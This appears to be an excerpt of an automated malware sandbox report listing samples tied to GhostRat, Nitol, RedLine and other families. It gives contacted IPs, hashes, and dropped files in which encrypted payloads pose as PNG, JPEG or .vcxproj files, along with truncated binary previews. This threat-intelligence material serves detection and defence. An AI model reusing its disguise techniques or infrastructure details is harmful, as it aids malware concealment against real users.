	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.20
	3gPZmVbozD.msi	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.20
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	118.178.60.9 39.103.20.20
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	118.178.60.9 39.103.20.20
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.20
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.20

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Program Files (x86)\mm3ujg\mm3ujg.exe	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse
C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse

Created / dropped Files

C:\Program Files (x86)\mm3ujg\log.src

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955226334636
Encrypted:	true
SSDEEP:	98304:UOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:To6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	1F3E3CF6B70701C9FD97822FB1B2E845
SHA1:	DBDC66AAE07ABCAF2D598111DC3DBE12EF79D969
SHA-256:	36D9EB0DA47F37992A873A0D0446F659478D3C8F14BDF1736E99921D42967CA0
SHA-512:	98A9F09EED9099B222BAAB56BEDAAAEE08A74A4CC780512FC2728620FC7FA175E6E757173754731E6D4D2F51CB9564F5C99ECDFD825E774CED78AA48D658515A
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\mm3ujg\mm3ujg.exe

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: setup.ic19.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\mm3ujg\tbcore3U.dll

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992517218176904
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/3:9S4+O6P5OeMRrjRy7aPZbm3k8V/3
MD5:	DACCFB18457F577C965E6D51005CAA47
SHA1:	5FE86050E432F6C626988BC3D321BA7101E253EA
SHA-256:	8B8A12CF2FE1D2DE57558184EC6CA5118704D3FC4BE16B8971C5753A86E7D6DA
SHA-512:	687B5ECC8E635242B0B20D892B1DE51B9B46F687D50EF76E007A574A249C34F7203EF1807C9D0A4785A0500B6B2DECBB31867DB5101D5AC598C9839272462352
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\mm3ujg\utils.vcxproj

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999397988882878
Encrypted:	true
SSDEEP:	6144:3iACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:y8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	A145E78C0C569BA632B34C6D283FF132
SHA1:	BFACA7671CD5983F920609AA1076219DD8A39C06
SHA-256:	27898E8DE8ED3B67EAE46AAFA6C7A64AC0359D3835383B6F9D5CF910914B4373
SHA-512:	FA69993F7F9F5ECDF601CED5AB7719C6C2D0DCED47BC364BDB732F2DB641932C005C436BE7B1F22EB38D67BF8ABD49E77CCFE2BE7BE3D9A617E73EAF750A27F6
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.212.102.187...(#ijstuvwxyz....lisyrf.net......(#..............LL01......................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\rXFCwD1I\log.src

Download File

Process:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955228288995
Encrypted:	true
SSDEEP:	98304:JOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:go6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	978D12332EDC942F44F85338B4EAC130
SHA1:	8254FA5C1EC2C2E6EADD6D0925510D3226F37BBE
SHA-256:	AF35973CC80CA43C63B882EE919A5AE597E76BF4B47DD42543D6B20972F211DD
SHA-512:	E7784C0A7518AA120033342541D04E78F82C311F9CD5721A7307980345761706849814F57CED1CA2C7F2234E5217618FCF88399785BA097C9EA9417424E34B17
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q....q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe

Download File

Process:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: setup.ic19.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\rXFCwD1I\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516681848527
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/c:9S4+O6P5OeMRrjRy7aPZbm3k8V/c
MD5:	7ECDD07A3ACC7D1065922CD75A96BB27
SHA1:	945953939EF82E1F94839D90E4710FCF599BEA65
SHA-256:	DB431FDB8D48C5ED7F2A572F6067AEB8950E059F044B965FC11CD2641538CB7E
SHA-512:	C1C3E48F66AFA0EA4D1E4705424A7E76D2B999B9E0EE57B5D81A33D301D6471F5B0F868921957C6909EEF59DE9D2A630D77EE432DF7C95B0BCD8404DCB99632A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\rXFCwD1I\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.99939805497325
Encrypted:	true
SSDEEP:	6144:LiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:O8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	7A7B028171C83D79239658EDBA372173
SHA1:	A7D233C68539DF43876D32227622CB7957031A56
SHA-256:	97A9D4CF49A4EB99B7CD2FDDB3A6EFF58AC4C33564EA7EDD5DC7C5EB02FA2B1F
SHA-512:	EE47BE1519A2D6AFC820CAC781F91CC0D67EE20A4DF103B372204B526759055C08F62D857B5E70F1004DB37AB8EFD716E2A13AD17ECB381344EAD2786F4A6EE7
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.212.102.187...(#ijstuvwxyz....lisyrf.net......(#..............LL01......................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	data
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:l:l
MD5:	739EDCC2C973B7A990767601FA661F21
SHA1:	6F8DF82DC929F3C40E2403252D9C7EC09001DBB6
SHA-256:	BA3C702B24E4EF16C111BF92823170F6E81FD37FBAFACCBEEF52192A1C094380
SHA-512:	098608F58AB3FC68088ACE47A30C15056D274AADA2893A224C29DDC0CC70F82B4CA723CE487DED1306F839AC12EE8782BC6383817FD77E7CDE3DEA99525731D1
Malicious:	false
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.349089533249406
Encrypted:	false
SSDEEP:	6:WuEub2yDhXANCrCa2BIDROQFDYy9LxXIM7OdUzW9E40/qcX:WU1MBIDRhFDZ9XIWgUzWg3
MD5:	ED0A14F8C97399523A83157F9EDC6D96
SHA1:	69F6FECA86366292C66D22DB0F10182DD6882FEA
SHA-256:	34DFC3EBAE31EDF4C6CEA77154F9063BD74A6B0EB977B16AE98319084CACAC27
SHA-512:	D6C4B0AC0E6EBDA3ADC9E3988E73C964ED2087D9EBF22CE3A7D61C38450140FE04DC0147398DE00737D0E820E1FDCEADDAC67793F7F5F8735226EB68F34470EA
Malicious:	false
Preview:	....l%00ZH.J-~d%VV.F(k$#JIJMc,!HXTO,<a,CA.Mc$+++++++++++++++++++++++++++++++++C__[(att..F.i: a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33YK.I.}g&UU.E+h' IJIN)`/"K[WL/?b/@B.Lb+%*********************************B^^Z)`uu..G.h;!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6\|ylllllllllllllllllllllllllllllllllllll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-51[1].jpg

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-52[1].jpg

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5062442
Entropy (8bit):	7.999518892518095
Encrypted:	true
SSDEEP:	98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
MD5:	70C21DA900796B279A09040B00953E40
SHA1:	7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
SHA-256:	901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
SHA-512:	851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
Malicious:	false
